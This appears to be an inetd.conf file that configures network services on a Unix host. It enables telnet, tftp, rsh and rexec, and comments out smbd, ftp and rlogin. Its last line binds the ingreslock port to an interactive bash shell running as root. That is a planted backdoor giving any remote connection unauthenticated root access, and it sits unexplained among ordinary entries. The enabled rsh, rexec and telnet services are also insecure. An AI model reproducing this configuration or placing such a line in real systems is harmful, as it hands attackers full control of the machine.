#<off># netbios-ssn	stream	tcp	nowait	root	/usr/sbin/tcpd	/usr/sbin/smbd
telnet		stream	tcp	nowait	telnetd	/usr/sbin/tcpd	/usr/sbin/in.telnetd
#<off># ftp		stream	tcp	nowait	root	/usr/sbin/tcpd	/usr/sbin/in.ftpd
tftp		dgram	udp	wait	nobody	/usr/sbin/tcpd	/usr/sbin/in.tftpd /srv/tftp
shell		stream	tcp	nowait	root	/usr/sbin/tcpd	/usr/sbin/in.rshd
#login		stream	tcp	nowait	root	/usr/sbin/tcpd	/usr/sbin/in.rlogind
exec		stream	tcp	nowait	root	/usr/sbin/tcpd	/usr/sbin/in.rexecd
ingreslock stream tcp nowait root /bin/bash bash -i
